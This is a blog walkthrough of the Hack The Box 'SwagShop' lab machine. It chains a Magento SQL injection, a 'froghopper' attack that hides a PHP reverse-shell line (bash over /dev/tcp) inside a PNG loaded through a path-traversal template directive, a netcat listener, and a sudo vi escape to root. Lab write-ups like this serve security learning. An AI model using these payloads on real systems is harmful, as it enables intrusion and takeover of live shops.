Posted: 2019/12/12 in Uncategorized

Walkthru for SwagShop

This is a detailed walk-thru for SwapShop written by dR1PPy


Challenges like the one posed by SwagShop are some of my favorite.
The ones that require a good combination of skills with toolsets along with skills with chaining exploits.

Overall a fun box to beat up on much thanks to ch4p for the challenge!

___ ___
/| |/|\| |\
/_| ´ |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password

PS: Use root flag as password!


Port Scan All The Things!


host port proto name state info
---- ---- ----- ---- ----- ---- 22 tcp ssh open OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0 80 tcp http open Apache httpd 2.4.18 (Ubuntu)

We quickly verify the OpenSSH & Apache versions are not a known exploitable version and move on.
During our HTTP enumeration we find this XML file

Which seems to contain some credentials (Possibly for the Beta SwagShop)


We are also able to enumerate the framework as Magento.

Gaining User Access

After some Google searching we find an exploit which gives us access to the Admin panel of the Framework via an SQLi


Once inside we can use the Magento frog hopper attack to get shell

First step is to enable symlinks in the settings of Magento.

System > Configuration > Advanced > Developer > Template Settings > Allow Symlinks "Yes" (Then save config)

Now we prep our shell by creating a file with the content below

<!--?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'"); ?-->

Now we get some random PNG file

And place our shellcode inside.

cat /tmp/shell.code >> random.png ### If the shell doesnt work try a better reverse shell example cat php-reverse-shell-1.0/php-reverse-shell.php >> random.png

Now back to Magento where we create a catalog item with our new png as the image logo.
Then we create a newsletter to load our code by adding the following to it's body.

{{block type='core/template' template='../../../../../../media/catalog/category/dR1PPy.png'}}

Now we start our listener then preview the template

nc -lvp 8888 # on my local machine

Using FrogHopper Attack with PNG file worked!

(NOTE: for some reason this attack kept failing with JPG files)

Once we have a shell we upgrade it to be fully TTY. We see /usr/bin/python3 is available so we can get TTY like so

python3 -c 'import pty; pty.spawn("/bin/sh")'

We grab the user flag found in /home/haris/user.txt and proceed to escalation.

Privilege Escalation

Again we start our enumeration cycle using the standard Enum tools.

Quickly we find LinEnum has shown us the path to root

[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*

[+] Possible sudo pwnage!

We can execute vi as root as long as we edit something in the /var/www/html/ directory.
So we exploit this like so

/usr/bin/vi /var/www/html/test.sh

Once in VI editor we break out to our root shell like the Kool-Aid man


# whoami
# cd /root/
# ls

OH Yeah!


Magento SQLi POC

Magento Froghopper Attack

GTFOBins for the PrivEsc syntax

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s